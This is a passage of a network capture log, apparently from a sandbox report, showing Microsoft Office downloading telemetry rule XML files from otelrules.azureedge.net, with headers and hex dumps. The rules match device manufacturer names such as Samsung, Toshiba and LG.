                                                                                        2024-11-01 12:46:49 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        64192.168.2.44982113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:49 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:49 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                        x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124649Z-16ccfc498978mvxwhC1DFWafzn00000000q000000000d27x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        65192.168.2.44982313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:50 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:50 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:50 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                        x-ms-request-id: 23cb26af-e01e-0052-1808-2cd9df000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124650Z-16ccfc49897rxrtbhC1DFWk40s00000000u000000000070m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        66192.168.2.44982413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:50 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:50 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:50 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 420
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                        x-ms-request-id: fd4533cb-201e-005d-3108-2cafb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124650Z-16ccfc4989744mtmhC1DFWr0ts00000000u0000000000amh
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:50 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        67192.168.2.44982513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:50 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:50 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:50 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                        x-ms-request-id: 3601e2f9-501e-0064-27bd-2a1f54000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124650Z-17c5cb586f659tsm88uwcmn6s400000003dg00000000cr1a
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        68192.168.2.44982613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:50 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:50 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:50 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                        x-ms-request-id: 38f7eb3e-301e-006e-6008-2cf018000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124650Z-16ccfc49897hshbrhC1DFW7g1c00000000p0000000003mst
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:50 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        69192.168.2.44982713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:50 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:50 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:50 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 423
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                        x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124650Z-16ccfc498972c2r2hC1DFWxq6800000000gg00000000aduk
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:50 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        70192.168.2.44982813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:51 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:51 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 478
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                        ETag: "0x8DC582B9B233827"
                                                                                        x-ms-request-id: 1a876f58-701e-0032-1608-2ca540000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124651Z-16dc884887bkpzdnhC1DFWbc3n00000000ng00000000a16v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:51 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        71192.168.2.44982913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:51 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:51 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                        x-ms-request-id: 38f7ec36-301e-006e-4608-2cf018000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124651Z-16ccfc49897bxnsthC1DFW5azc00000000t0000000003ua1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:51 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        72192.168.2.44983013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:51 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:51 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                        ETag: "0x8DC582BB046B576"
                                                                                        x-ms-request-id: 5e673fc6-c01e-00a2-4930-2c2327000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124651Z-16dc884887bkpzdnhC1DFWbc3n00000000r0000000004qsr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:51 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        73192.168.2.44983113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:51 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:51 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 400
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                        x-ms-request-id: 44367558-401e-0078-2932-2c4d34000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124651Z-159b85dff8fj5szfhC1DFW6b2g00000001bg00000000c28z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:51 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        74192.168.2.44983313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:51 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
